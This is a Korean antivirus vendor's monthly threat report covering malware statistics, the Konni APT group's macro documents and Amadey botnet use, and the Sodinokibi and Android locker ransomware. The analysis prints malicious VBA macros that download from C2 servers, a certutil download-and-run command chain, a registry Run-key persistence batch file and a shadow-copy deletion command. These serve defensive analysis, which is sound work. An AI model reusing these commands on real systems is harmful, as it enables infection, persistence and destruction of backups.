01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No

Transcription

1 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No

2 01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 02 전문가보안기고 한국어구사 Konni 조직, 블루스카이작전 'Amadey' 러시아봇넷활용 신종랜섬웨어 'Sodinokibi', 입사지원서사칭해유포중! 03 악성코드분석보고 개요 악성코드상세분석 결론 04 글로벌보안동향 53-67

3 이스트시큐리티보안동향보고서 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 1

4 01 악성코드통계및분석 1. 악성코드동향 2019 년 4 월에는 GandCrab 를기존에주로유포하던 VenusLocker 유포조직외에새로운조직으로보이는단체가기존 VenusLocker 조직의유포방식과유사하게 GandCrab 을뿌리는정황이확인되었고, 그외에도 GandCrab 랜섬웨어와여러가지연관성을지닌 Sodinokibi 랜섬웨어가등장하였습니다. 기업환경에서는 2,3 월과마찬가지로이번달도역시 CLOP 랜섬웨어유포조직이진행하는기업타깃대량공격이확인되었습니다. 4 월에발생한 GandCrab 랜섬웨어이슈를보면, 기존의이메일첨부파일을활용한사회공학적기법공격과거의동일한방식으로유포가이뤄졌으며, 중소기업을사칭한견적요청, 입사지원서위장, 이미지사용중지요청, 경찰청, 국세청, 헌법재판소등으로사칭한소환장 등그내용이기존부터많이활용되던키워드를여전히사용하면서본문내용만살짝바꾸는방식을주로활용했습니다. 특히 4 월에는기존 GandCrab 랜섬웨어를주로유포하던 VenusLocker 유포조직 외에도 ESRC 에서리플라이오퍼레이터 (Reply Operator) 라고명명한또다른공격조직의활동이포착되었고이들역시여러차례에걸쳐 GandCrab 랜섬웨어를유포하는상황이확인되었습니다. GandCrab 뿐만아니라기업대상윈도서버를공격하는클롭 (Clop) 랜섬웨어도 2 월말부터시작하여 3 월그리고 4 월까지가그피해가꾸준히계속되는상황입니다. 클롭랜섬웨어의경우이전에송장이나인보이스사칭으로악성메일을뿌렸고악성문서첨부파일을통해매크로활성화를유도하여감염을진행하고있으며 ESRC 에서는이클롭랜섬웨어공격을주도하는조직이 TA505 공격그룹에의한소행으로추정하고있습니다. 랜섬웨어이슈외에도다양한 APT 공격시도도확인되었고, 특히 4 월에는해외에서커다란 2 가지정보유출사고가있었습니다. 첫번째로, Docker Hub 데이터베이스가해킹당해 19 만명의사용자정보가유출되는커다란사고가발생했습니다. 노출된사용자정보에는일부사용자이름과해쉬처리된암호, GitHub 와 Bitbucket 저장소에대한토큰도포함되어있었기때문에토큰에저장된사용권한에따라서는특정저장소로접근이가능한문제였고 Docker Hub 이미지가서버구성과어플리케이션에활용되는특징때문에심각한공급망공격 (Supply-Chain-Attacks) 으로이어질가능성이있는대규모유출사고였습니다. 두번째로는, 특히해외에서특정업계사람들의구인 / 구직과동종업계인력정보를파악할수있는 SNS 서비스인 Linkedin 의사용자기록 6천만건이온라인에노출된사실이알려져큰이슈가되었습니다. 특히링크드인의경우단순이메일이나개인정보뿐만아니라, 프로필, 직업기록, 교육기록, 위치, 기술목록, 다른소셜프로필정보, 최근프로필업데이트시간등다양한민감정보를제공했기에더욱커다란이슈가되었습니다. 벌써 1 년중 1/3 이지났습니다. 지금까지외부위협으로부터안전하셨나요? 지금한번더사용중인 OS 와 SW 의 최신보안패치의점검과자료백업진행도권고드립니다. 2

5 01 악성코드통계및분석 2. 알약악성코드탐지통계 감염악성코드 TOP15 감염악성코드 Top 15 는사용자 PC 에서탐지된악성코드를기반으로산출한통계다 년 4 월의감염악성코드 Top 15 리스트에서는지난 2019 년 3 월에 1,2,3 위를차지했던 Trojan.Agent.gen, Misc.HackTool.AutoKMS, Trojan.HTML.Ramnit.A 이이번달 Top 15 리스트에서도역시 1,2,3 위를차지했다. 전반적으로악성코드진단수치자체는지난 3 월과대비하여 5% 가량소폭감소한추세를보였다. 순위 등락 악성코드진단명 카테고리 합계 ( 감염자수 ) 1 - Trojan.Agent.gen Trojan 1,167, Misc.HackTool.AutoKMS Trojan 825, Trojan.HTML.Ramnit.A Trojan 713, Hosts.media.opencandy.com Host 554, Misc.HackTool.KMSActivator Trojan 382, Misc.Keygen Trojan 290, Trojan.ShadowBrokers.A Trojan 277, Gen:Trojan.Downloader.NGX@ae4UWZeO Trojan 277, Win32.Ramnit.Dam Virus 237, Misc.Riskware.TunMirror Trojan 211, Win32.Neshta.A Virus 205, Gen:Variant.Razy Trojan 186, New Trojan.PSW.Seikooc Trojan 180, Trojan.LNK.Gen Trojan 165, New Worm.ACAD.Bursted.doc.B Worm 159,856 * 자체수집, 신고된사용자의감염통계를합산하여산출한순위임 2019 년 04 월 01 일 ~ 2019 년 04 월 31 일 3

6 01 악성코드통계및분석 악성코드유형별비율 악성코드유형별비율에서트로이목마 (Trojan) 유형이가장많은 80% 를차지했으며호스트 (Host) 파일변조유형이 9% 로그뒤를이었다. 웜 (Worm) 3% 호스트파일 (Host) 바이러스 9% (Virus) 8% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 취약점 (Exploit) 웜 (Worm) 트로이목마 (Trojan) 80% 기타 (Etc) 백도어 (Backdoor) 바이러스 (Virus) 하이재커 (Hijacker) 호스트파일 (Host) 카테고리별악성코드비율전월비교 4 월에는 3 월과비교하여트로이목마 (Trojan) 악성코드감염카테고리비율이소폭증가했으며, 바이러스 (Virus) 유형이 지난달과비슷한추세를보였다. 또한호스트파일 (Host) 유형은소폭감소했다. 트로이목마 (Trojan) 80% 75% 스파이웨어 (Spyware) 0% 0% 애드웨어 (Adware) 0% 3% 하이재커 (Hijacker) 0% 0% 웜 (Worm) 3% 0% 취약점 (Exploit) 0% 3% 바이러스 (Virus) 8% 8% 백도어 (Backdoor) 0% 0% 호스트파일 (Host) 9% 11% 기타 (Etc) 0% 0% 0% 20% 40% 60% 80% 100% 4 월 3 월 4

7 악성코드통계및분석 3. 랜섬웨어차단및악성코드유포지 / 경유지 URL 통계 4 월랜섬웨어차단통계 해당통계는통합백신알약공개용버전의 랜섬웨어차단 기능을통해수집한월간통계로써, DB 에의한시그니쳐 탐지횟수는통계에포함되지않는다. 4 월 1 일부터 4 월 30 일까지총 95,422 건의랜섬웨어공격시도가차단되었습니다. 2 월에비해공격건수는 13% 가량감소하였다. 4 월랜섬웨어차단통계 4,500 4,000 3,500 3,000 2,500 2,000 1,500 1, 악성코드유포지 / 경유지 URL 통계 해당통계는 Threat Inside 에서수집한악성코드유포지 / 경유지 URL 에대한월간통계로, 4 월한달간총 9,887 건의악성코드경유지 / 유포지 URL 이확인되었다. 이수치는 3 월한달간확인되었던 14,233 건의악성코드유포지 / 경유지건수에비해약 30% 가량감소한수치다 악성 URL 경유지 / 유포지통계 0 경유지 유포지 URL 수 5

8 이스트시큐리티보안동향보고서 02 전문가보안기고 1. 한국어구사 Konni 조직, 블루스카이작전 'Amadey' 러시아봇넷활용 2. 신종랜섬웨어 'Sodinokibi', 입사지원서사칭해유포중! 6

9 02 전문가보안기고 1. 한국어구사 Konni 조직, 블루스카이작전 'Amadey' 러시아봇넷활용 지난 01 월 02 일 암호화폐내용의 Konni APT 캠페인과 ' 오퍼레이션헌터아도니스 ' 보고서를공개한바있는데, 최근이들의사이버위협활동이또다시감지되고있습니다. File Name MD5 C2 요청주신정책관련자료.doc (BlueSky) 0eb c74327cd4d47819f filer1.1apps[.]com File Name MD5 C2 젠트리온지갑관련자료.doc (BlueSky) 2bfbf8ce47585aa86b1ab90ff109fd57 filer2.1apps[.]com 한국어를구사하는대표적인 APT 위협그룹중에하나인 'Konni' 조직은아직도베일에싸여있습니다. 최근변종이연속적으로발견되고있는데, 헌터아도니스에서공개된바있는 'BlueSky' 계정이동일하게사용되고있는 점이주목됩니다. ESRC 는하나의계정에서지속적인 APT 공격정황이포착됨에따라이번사이버작전을 ' 오퍼레이션블루 스카이 (Operation Blue Sky)' 로명명했습니다. 이번위협은악성워드 (DOC) 문서로부터시작되며, 이들은주로스피어피싱을통한공격벡터를활용합니다. 7

10 02 전문가보안기고 04 월달에돌아온 Konni' 2019 년 04 월 29 일에제작된악성문서파일은실행시다음과같이보안경고메시지와함께매크로실행을 유도하게만듭니다. [ 그림 1] 매크로실행을유도하기위한안내메시지화면 여기서흥미로운점은본문화면이 'TA505 조직, 또다시엑셀문서로위장한악성이메일유포해 ' 분석자료에서도 유사하게사용된바있습니다. 두위협조직이직간접적으로연관된것인지, 인터넷에공개된자료가사용되어우연하게오버랩된것인지아직 확실하지않습니다. 8

11 02 전문가보안기고 AppWord.Quit False End Sub Sub Document_Open() Dim URL As String Dim Location As String Dim FSO As Object Set FSO = CreateObject("Scripting.FileSystemObject") Set objwinhttp = CreateObject("WinHttp.WinHttpRequest.5.1") URL = " objwinhttp.open "GET", URL, False objwinhttp.send "" 공격자는마치한국의유명포털사이트도메인처럼사칭한 C2 서버에서또다른문서파일을다운로드해실행하는 명령을수행합니다. ESRC 는해당서버를조사하는과정에서디렉토리리스팅설정문제로내부에등록된다른파일을확인할수 있었습니다. 9

12 02 전문가보안기고 [ 그림 2] C2 서버에등록된다른파일목록 여기에는총 12 개항목의 DOC 문서가포함되어있으며, 대부분공격에사용하기위한목적으로제작되었습니다. 각각의화면은대부분암호화폐관련내용이나금융관련문구를포함하고있으며, 동일하게 'BlueSky' 계정에서 제작되었습니다. 10

13 02 전문가보안기고 [ 그림 3] DOC 문서실행된화면모음 해당파일들은동일한목적으로제작되었기때문에대표파일하나만기준으로설명하면다음과같습니다. 우선매크로기능을통해 2 차 C2 서버 'alabamaok0515.1apps[.]com' 주소로통신을시도합니다. End If scl = scl & Chr(&H65) scl = scl & Chr(&H78) scl = scl & Chr(&H65) scl = scl & Chr(&H20) scl = scl & Chr(&H2F) scl = scl & Chr(&H71) 11

14 02 전문가보안기고 scl = scl & Chr(&H20) scl = scl & Chr(&H2F) scl = scl & Chr(&H63) scl = scl & Chr(&H20) Dim smo As String smo = "copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f && cd /d %TEMP% && ren 1.txt 1.bat && del /f /q 1.txt && 1.bat" scl = scl + smo nresult = Shell(sCL, vbhide) ActiveDocument.Save End Sub '1.txt' 파일은다음과같이 '3.txt' 파일을로드하게됩니다. [ 그림 4] '1.txt' 배치파일명령화면 12

15 02 전문가보안기고 '1.txt' 배치파일은 '3.txt' BASE64 코드를디코딩해 'setup.cab' 파일로생성하고다시압축을해제한후 'install.bat' 파일을실행하는과정을거칩니다. '3.txt' 파일은다음과같이 BASE64 코드를가지고있습니다. [ 그림 5] '3.txt' 파일코드화면 마지막으로변환되는 'setup.cab' 압축파일내부에는 'install.bat', 'picture.exe' 파일이포함되어있으며, ' ' C2 서버의명령을대기하게됩니다 'picture.exe' 파일내부에는다음과같은 PDB 정보가포함되어있습니다. - c:\users\admin\documents\xicon\vs2005\release\xicontest.pdb 13

16 02 전문가보안기고 05 월달에돌아온 Konni ESRC 는 05 월 13 일제작된유사한변종을추가로확인할수있었고, 04 월과마찬가지로 'BlueSky' 계정과공격 벡터는거의같은흐름을가지고있으며, 악성 DOC 는코드페이지 949 인한국어기반으로제작되었습니다. 다만, 이번공격에서는매크로코드내부의 C2 URL 주소를단순한방식으로난독화해숨겨두었고, 이기법은이전 아도니스작전이랑거의유사합니다. AppWord.Quit False End Sub Sub Document_Open() Dim URL As String Dim Location As String Dim FSO As Object Set FSO = CreateObject("Scripting.FileSystemObject") Set objwinhttp = CreateObject("WinHttp.WinHttpRequest.5.1") Dim surl As String surl = Chr(&H68) & Chr(&H74) & Chr(&H74) & Chr(&H70) & Chr(&H3A) & Chr(&H2F) & Chr(&H2F) & Chr(&H66) & Chr(&H69) & Chr(&H67) & Chr(&H68) & Chr(&H69) & Chr(&H74) & Chr(&H69) & Chr(&H6E) & Chr(&H67) & Chr(&H31) & Chr(&H30) & Chr(&H31) & Chr(&H33) & Chr(&H2E) & Chr(&H6F) & Chr(&H72) & Chr(&H67) & Chr(&H2F) & Chr(&H32) & Chr(&H2F) URL = surl + "modif8.doc" objwinhttp.open "GET", URL, False objwinhttp.send "" surl 문자로선언된 16 진수코드를변환하면다음과같은사이트로접속을하여 'modif8.doc' 파일을다운로드해 실행하게됩니다 번째스테이지로작동하는 DOC 파일역시한국어기반으로제작되었으며, 문서작성자역시 'BlueSky' 계정으로 동일합니다. 이악성파일이실행되면다음과같이암호화폐관련내용으로이용자를현혹하게됩니다. 14

17 02 전문가보안기고 [ 그림 6] 악성문서가실행될경우보여지는화면 매크로코드를살펴보면다음과같이선언되어있고, 16 진수코드를 ASCII 코드로변환하면새로운 C2 주소가 확인됩니다. End If sfirst = sfirst & Chr(&H65) sfirst = sfirst & Chr(&H78) sfirst = sfirst & Chr(&H65) 15

18 02 전문가보안기고 sfirst = sfirst & Chr(&H20) sfirst = sfirst & Chr(&H2F) sfirst = sfirst & Chr(&H71) sfirst = sfirst & Chr(&H20) sfirst = sfirst & Chr(&H2F) sfirst = sfirst & Chr(&H63) sfirst = sfirst & Chr(&H20) Dim smo As String Dim smid As String smid = Chr(&H68) & Chr(&H74) & Chr(&H74) & Chr(&H70) & Chr(&H3A) & Chr(&H2F) & Chr(&H2F) & Chr(&H74) & Chr(&H67) & Chr(&H62) & Chr(&H61) & Chr(&H62) & Chr(&H63) & Chr(&H72) & Chr(&H66) & Chr(&H76) & Chr(&H2E) & Chr(&H31) & Chr(&H61) & Chr(&H70) & Chr(&H70) & Chr(&H73) & Chr(&H2E) & Chr(&H63) & Chr(&H6F) & Chr(&H6D) & Chr(&H2F) smo = "copy /Y %windir%\system32\certutil.exe %TEMP%\ct.exe && cd /d %TEMP% && ct -urlcache -split -f " + smid + "1.txt && cd /d %TEMP% && ren 1.txt 1.bat && del /f /q 1.txt && 1.bat" sfirst = sfirst + smo nfinal = Shell(sfirst, vbhide) ActiveDocument.Save End Sub C2 주소는기존 Konni 조직이사용하는 '1apps[.]com' 호스팅서비스가이번에도그대로사용됩니다. - 도메인은랜덤한영문알파벳이사용되었으며, 매크로함수에의해 '1.txt' 파일을다운로드해배치파일형태로실행하며, 'certutil.exe' 정상파일을 'ct.exe' 파일로복사해사용합니다. 이러한방식은 EDR 같은제품들이악성여부를판단하는데회피하는요소로활용될수있습니다. '1.txt' 파일은다음과같은명령어가조합되어있고, 기존이랑큰차이가없습니다. 16

19 02 전문가보안기고 [ 그림 7] '1.txt' 파일화면 배치파일명령이작동할경우 '3.txt' 파일의코드를가져오는데이전과마찬가지로 BASE64 코드로인코딩된데이터를 가지고있으며, 'ct.exe'(=certutil.exe) 파일을통해압축을해제하는과정을거칩니다. 17

20 02 전문가보안기고 [ 그림 8] '3.txt' 코드화면 BASE64 코드블럭이디코딩되면기존과동일하게 'setup.cab' 파일로변환되고, 압축내부에존재하는 'install.bat' 파일이실행됩니다. 압축내부에는 'install.bat' 파일과함께 'victory.exe' 파일이포함되어있고, 아래와같은배치파일명령에의해 실행됩니다. 18

21 02 off copy /y %~dp0\victory.exe C:\Users\Public\Documents > nul reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchost /t REG_SZ /d "C:\Users\Public\Documents\victory.exe" /f > nul C:\Users\Public\Documents\victory.exe > nul %~dp0\remove.bat > nul 'victory.exe' 악성파일이실행되면 C2 서버로접속해또다른악성코드를다운로드하여실행을시도합니다. - 그리고다음과같이러시아봇넷으로알려져있는 AMADEY 패널로접속을시도합니다. - AMADEY 봇넷코드는이미깃허브등에공개되어있어여러사이버위협에지속적으로악용되고있는실정입니다. 19

22 02 전문가보안기고 [ 그림 9] AMADEY 서버메인화면 AMADEY 서버의 'index.php' 파일에는 'config.php' 코드에설정된아이디와암호를통해접근하게됩니다. 20

23 02 전문가보안기고 <? include( "cfg/config.php" ); session_start(); error_reporting( 0 ); if ( isset( $_POST["login"]) && isset( $_POST["password"] )) { $login = $_POST["login"]; $password = $_POST["password"]; if ( ( $login == $conf["login"] ) && ( md5( $password ) == $conf["password"] ) ) { $_SESSION["Name"] = "ROOT"; "Refresh: 0; url = statistic.php" ); if ( ( $login == $conf["observer_login"] ) && ( md5( $password ) == $conf["observer_password"] ) ) { $_SESSION["Name"] = "OBSERVER"; "Refresh: 0; url = statistic.php" ); } if ( $_GET['logout'] == 1 ) { header( "Location: login.php" ); exit; 21

24 02 전문가보안기고 봇넷과세션이연결되면, 공격자가설정한악의적인명령이수행되며, 감염된컴퓨터의정보가유출될수있습니다. [ 그림 10] AMADEY 컨트롤센터 (CC) 화면 Konni 조직은오퍼레이션블루스카이를통해 AMADEY 봇넷을활용하고있다는점에주목되며, ESRC 는이들조직이 사용한공격도구와전술에대한지속적인연구를수행하고있습니다. 'Konni' 캠페인과관련한보다상세한침해지표 (IoC) 내용은 ' 쓰렛인사이드 (Threat Inside)' 의위협인텔리전스리포트를 통해자세한내용이공개되어있으며, 지속적으로정보를제공할예정입니다. 22

25 02 전문가보안기고 2. 신종랜섬웨어 'Sodinokibi', 입사지원서 사칭해유포중! 2019 년 05 월 15 일오전 ' 입사지원합니다 ' 라는입사지원서를사칭한피싱메일이유포되고있어채용담당자분들의 주의가필요합니다. 이번에포착된피싱메일은어제발견된견적요청메일에서제목과내용만약간수정되었을뿐, 전반적으로비슷한 형태를띠고있습니다. [ 그림 1] 입사지원서를사칭한피싱메일화면 23

26 02 전문가보안기고 해당메일에는 '(OOO) 이력서.alz' 라는 '( 지원자명 ) 이력서 ' 형태의제목을가진압축파일 (alz) 이첨부되어 있습니다.( 지원자명의경우피싱메일에따라상이할수있습니다.) 채용담당자가해당메일을입사지원서관련파일로착각하여압축해제하면, 다음과같이 PDF 문서 (.pdf) 를위장한 악성실행파일이들어있습니다. [ 그림 2] PDF 문서파일을위장한악성파일 악성실행파일은 '(OOO) 이력서.pdf( 긴공백 ).exe' 이라는이중확장자형태이며, 굉장히많은공백을삽입해악성 실행파일임을속이려고시도했습니다. 따라서채용담당자가해당파일을 PDF 파일로착각해실행한다면, 다음과같이 Sodinokibi 랜섬웨어에감염됩니다. Sodinokibi 랜섬웨어는감염된 PC 의바탕화면을파란색화면으로변경하고, 랜섬노트에 Hello, dear friend 라는 문구로시작한다는특징이있습니다. 24

27 02 전문가보안기고 [ 그림 3] Sodinokibi 랜섬웨어에감염된 PC 화면 이번에발견된 Sodinokibi 랜섬웨어샘플은각폴더에 '0umzxro1-readme.txt' 라는랜섬노트와 'e21290ac.lock' 라는 파일이생성되며, 0umzxro1 확장자로모든파일이암호화됩니다. [ 그림 4] 암호화된파일화면 25

28 02 전문가보안기고 [ 그림 5] Sodinokibi 랜섬노트화면 랜섬노트에는안내된링크를 TOR 브라우저를통해방문하라는메시지가적혀있으며, TOR 브라우저를통해해당링크 주소로들어가면다음과같은사이트를확인할수있습니다. 26

29 02 전문가보안기고 [ 그림 6] Sodinokibi 랜섬노트에기재된사이트화면 Sodinokibi 랜섬웨어는최근발견된신종랜섬웨어로이전의갠드크랩처럼국내에대량으로유포되고있습니다. 각기업의채용담당자께서는출처가불분명한사용자에게서온 ' 입사지원서 ' 이메일에포함된첨부파일다운로드를 지양해주시기바라며, 파일을실행하기전에는백신프로그램을이용하여악성여부를확인해주시기바랍니다. 알약에서는해당악성샘플에대하여 'Trojan.Ransom.Sodinokibi' 으로탐지중에있습니다. 27

30 이스트시큐리티보안동향보고서 03 악성코드분석보고 개요 악성코드상세분석 결론 28

31 03 악성코드분석보고 [Trojan.Ransom.Sodinokibi] 악성코드분석보고서 1. 개요 최근신종 Sodinokibi 랜섬웨어가발견되었다. 이번에발견된악성코드는난독화된자바스크립트가 Powershell 을실행하고디코딩을한후최종적으로정상프로세스에랜섬웨어파일을주입하여실행하는형태이다. 또한로컬시스템만감염시키는것이아니라로컬과연결된네트워크드라이브에대해서도암호화를시도하고, C&C 서버에사용자정보를전송한다. 지속적인변종이등장할가능성이높은만큼사용자의주의가필요하다. 따라서, 본보고서에서는 Sodinokibi 랜섬웨어를상세분석하고자한다. 29

32 03 악성코드분석보고 2. 악성코드상세분석 1. 랜섬웨어드로퍼이악성코드는여러중간과정을통해최종랜섬웨어 PE 파일을드롭한다. 이과정은자바스크립트실행, 파워쉘스크립트실행, 난독화 PE 실행순으로진행된다. 난독화된자바스크립트코드는아래와같이문자를리스트화하여인덱스를이용한산술계산을진행한다. 복호화된코드는파워쉘스크립트를실행한다. 이때생성된파워쉘스크립트또한난독화되어있다. [ 그림 1] 자바스크립트코드일부 [ 그림 2] 난독화된파워쉘스크립트코드 30

33 03 악성코드분석보고 base64 로인코딩되어있어있는파워쉘스크립트를디코딩하면.NET 으로빌드한 PE 파일이나파일형태로저장하여 실행하지않고 [Reflection.Assembly]::Load 를이용하여파일을읽어현재스크립트에서 Install1 을실행한다. [ 그림 3] 디코딩된파워쉘스크립트 Install1 에는 base64 로인코딩된 PE 파일이존재하며이를디코딩하고실행한다. [ 그림 4] 인코딩된 PE 파일 해당파일은델파이로빌드되었으며, HELP 리소스에존재하는 0x7b 로 xor 인코딩된 PE 파일을숨기고있다. 31

34 03 악성코드분석보고 [ 그림 5] HELP 리소스에존재하는인코딩된 PE 파일 디코딩된파일은특정백신의존재를확인하고 20 분간지연했다가, autoup.exe 라는이름의정상프로세스에악성 파일을주입하여실행한다. [ 그림 6] 프로세스인젝션코드 32

35 03 악성코드분석보고 2.1. 중복실행방지 중복실행을방지하기위해뮤텍스를사용한다. 뮤텍스의이름은 Global\3555A3D6-37B F7BE- F3AAB5B6644A 이고, 만약뮤텍스가중복되어있으면프로세스를종료한다. [ 그림 7] 중복실행방지코드 2.2. 프로세스종료 현재실행중인프로세스이름을검색하여 mysql.exe 프로세스가실행중일경우해당프로세스를종료한다 [ 그림 8] 특정프로세스종료코드 2.3 시스템복원기능무력화 vssadmin.exe 프로세스명령어를통해시스템복원파일인볼륨섀도우복사본을삭제한다. 이를통해감염된 시스템의복원기능이무력화된다. 실행코드는다음과같다. "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures [ 표 1] 볼륨섀도우삭제코드 2.4 사용자정보전송 33

36 03 악성코드분석보고 감염 PC 로부터 OS 정보, ComputerName, 그룹정보, 언어정보, 암호화에사용된키정보등을탈취및레지스트리에 저장한다. 해당정보들은 HKEY_LOCAL_MACHINE\SOFTWARE\recfg 로저장되어이후 C&C 서버로전송된다. [ 그림 9] 감염 PC 정보 이때사용되는도메인은총 1079 개로이중임의로접속을시도한다. 접속 URL 은다음의경로중임의로택하는특정 규칙을가진다. 하위경로 1 하위경로 2 "wp-content"; "images" "static"; "pictures" "content"; "image" "include"; "temp" "uploads"; "tmp" "news"; "graphic" "data"; "assets" "admin"; "pics" "game" [ 표 2] URL 경로리스트 선택된경로하위로 jpg, png, gif 파일로데이터를전송한다. [ 그림 10] 사용자정보전송코드 2.5. 랜섬웨어기능해당랜섬웨어는사용자의시스템언어를확인하여암호화여부를결정한다. 다음과같은언어를사용중일경우에는암호화를진행하지않으며, 이외의언어를사용하는시스템에대해서만암호화를진행한다. 34

37 03 악성코드분석보고 [ 그림 11] 사용자시스템언어확인 LANG_ROMANIAN, LANG_AZERBAIJANI, LANG_RUSSIAN, LANG_BELARUSIAN, LANG_UKRAINIAN, LANG_ESTONIAN, LANG_LATVIAN, LANG_TAJIK, LANG_FARSI, LANG_ARMENIAN, LANG_AZERI, LANG_GEORGIAN, LANG_KAZAK, LANG_KYRGYZ, LANG_TURKMEN, LANG_UZBEK, LANG_TATAR [ 표 3] 확인하는시스템언어목록 암호화대상파일을검색하고암호화를진행한다. 다음과같은문자열이포함되어있는경우암호화에서제외된다. 이는시스템운영에필요한폴더및파일을암호화하지않음으로써정상적인악성행위를유지하기위함으로보인다. 다음은암호화제외폴더와파일목록이다. 암호화제외폴더목록 암호화제외파일목록 program files (x86), msocache,program files, boot, intel, $windows.~bt, perflogs, windows, $windows.~ws, system volume information,$recycle.bin, tor browser,mozilla,appdata,programdata,windows.old,google,application data, bootsect.bak, bootfont.bin, ntldr, ntuser.ini, ntuser.dat,desktop.ini,ntuser.dat.log,autorun.inf,boot.ini,iconcache.db,thumbs.db [ 표 4] 암호화제외목록 35

38 03 악성코드분석보고 다음은암호화대상파일을검색하는코드이다. [ 그림 12] 암호화대상파일검색코드 해당랜섬웨어는아래와같은확장자를제외한파일에대해서만암호화를진행한다. msi, spl, ics, icns, themepack, deskthemepack, ps1, 386, diagcab, ani, scr, theme, bin, icl, key, mpa, hlp, com,ico, adv, hta, shs, drv, rtp, msc, msu, sys, ldf, bat, prf, wpx, nls, rom, mod, dll, lnk, diagpkg, diagcfg, lock, ocx, idx, cpl, exe, cur, cab, msp, nomedia, cmd, msstyles [ 표 5] 암호화제외확장자 암호화가완료되면아래와같이 [ 원본파일이름 ].[ 기존확장자명 ]. 뒤에 [ 영문숫자랜덤 ] 이추가된다. 36

39 03 악성코드분석보고 [ 그림 13] 암호화완료화면 파일암호화가모두끝나면, 랜섬웨어감염사실과파일복호화방법을알리는랜섬노트를생성한다. 랜섬웨어는 사용자바탕화면경로에확장자로사용한 [ 영문숫자랜덤 ]-readme.txt 형식으로생성한다. 내용은감염된파일을 복구하기위해 TOR 브라우저로접속할것을안내하고있다. 또한감염된 PC 의바탕화면을파란색화면으로변경한다. [ 그림 14] 랜섬노트화면 37

40 03 악성코드분석보고 [ 그림 15] 감염된시스템의바탕화면 38

41 03 악성코드분석보고 3. 결론 해당랜섬웨어는로컬시스템만감염시키는것이아니라로컬과연결된네트워크드라이브에대해서도암호화를시도 한다. 연결된시스템이백업을위한폴더나서버일경우더큰피해로이어질수있다. 사용자들은랜섬웨어를예방하기위해중요파일은주기적으로백업하는습관을들여야한다. 또한패치누락으로인한 취약점이발생하지않도록운영체제와소프트웨어는최신버전을유지하는것이중요하다. 현재알약에서는 Trojan.Ransom.Sodinokibi 로진단하고있다. 39

42 03 악성코드분석보고 [Trojan.Android.Locker] 악성코드분석보고서 1. 개요 최근 PC 악성코드의대부분은랜섬웨어이며복호화대가로암호화폐를요구하고있다. 이러한흐름이안드로이드에서도빈번하게나타나기시작했다. 관련앱은기기정보를탈취하여감염자를구별하는데사용한다. 외부저장소의폴더와파일을가리지않고저장된모든파일을암호화한다. 또한, 연락처도암호화한다. 이때암호화에사용되는알고리즘은 AES 이며키값은해커의 C&C 를통해서얻어온다. 암호화폐를이용하여비용을지불하면복호화가진행된다. 본분석보고서에서는 Trojan.Android.Locker 를상세분석하고자한다. 40

43 03 악성코드분석보고 2. 악성코드상세분석 2.1 게임앱위장 해당악성앱의아이콘은전세계적으로인기를끈게임으로위장하고있으며사용자가설치한이후에는자동으로 자신의아이콘을감춘후바로암호화관련액티비티가실행된다. [ 그림 1] 아이콘숨김 2.2 필요권한암호화에필요한행위를위해서정의된권한들이며각각을살펴보면 INTERNET 은 C&C 와의통신, RECEIVE_BOOT_COMPLETED 는지속적인악성행위를위해서기기가부팅되면앱자동실행, SET_WALLPAPER 랜섬웨어감염을나타내기위한기기바탕화면변경, READ_EXTERNAL_STORAGE 와 WRITE_EXTERNAL_STORAGE 는대상파일들을읽고쓴후암호화하는데각각필요한권한이다. [ 그림 2] 필요권한 41

44 03 악성코드분석보고 2.3 바탕화면변경 감염된사실을나타내기위해서기기의바탕화면을변경한다. 해당언어는러시아어이며 당신의폰은 잠겼습니다 라는의미이며러시아를대상으로하는악성앱임을알수있다. [ 그림 3] 랜섬노트이미지파일 42

45 03 악성코드분석보고 [ 그림 4] 앱내부에저장된랜섬웨어감염화면 2.4 기기정보탈취기기정보에서디바이스, 브랜드, 하드웨어, 아이디, 모델을탈취하여 md5 암호화한후고유식별번호로쓰고추가로릴리즈, 인코딩된모델과통신사국가코드를이용하여 C&C 의추가경로로사용한다. 이후외부저장소와관련된권한이있을경우암호화를진행한다. 이때, 암호화키값은 C&C 를통해서얻는다. 43

46 03 악성코드분석보고 [ 그림 5] C&C 연결및파일암호화진행 2.5 파일암호화진행 저장소에저장된폴더와파일을가리지않고모두암호화한다. 대상파일의경로를확인하고 encrypted 문구가 없으면파일을읽어드리고 AES 암호화를진행한다. 원본파일은삭제한다. 44

47 03 악성코드분석보고 [ 그림 6] 파일암호화 2.6 연락처암호화진행 파일암호화가끝나면이어서연락처암호화를진행한다. 파일암호화와달리 AES 암호화이후에나오는문자열을 Base64 인코딩을추가로진행한다. 원본연락처는삭제한다. 45

48 03 악성코드분석보고 [ 그림 7] 연락처암호화 2.7 기기상태저장 현재기기가어떤상태인지저장한다. 앱의 sharedpreferences 에상태를저장한다. 암호화가완료되면 worked 가 1 이된다. 46

49 03 악성코드분석보고 [ 그림 8] 기기상태저장 2.8 기기조작제어 뒤로가기, 앱종료, 홈버튼조작과멀티화면등악성앱의랜섬노트화면이화면에서사라지는작용이생기면바로 다시나타나도록하여기기의터치와조작을통한사용을완전히차단한다. 47

50 03 악성코드분석보고 [ 그림 9] 기기사용차단 2.9 복호화요청복호화요청탭을누르면이전에수집했던탈취한기기정보로조합한고유번호를확인하여복호화비용지불여부를확인한다. 암호화폐지불이완료됐다면복호화가진행된다. 이후에복호화완료상태인 finished 문자열을기록한다. 만약해당부분이비어있다면, 현재실행중인앱프로세스를확인하고랜섬웨어행위와관련된액티비티를새롭게시작한다.( 현재 C&C 와의통신이되지않아서복호화비용지불과정에서어떠한화면이추가로나타나는지알수없다.) 48

51 03 악성코드분석보고 49

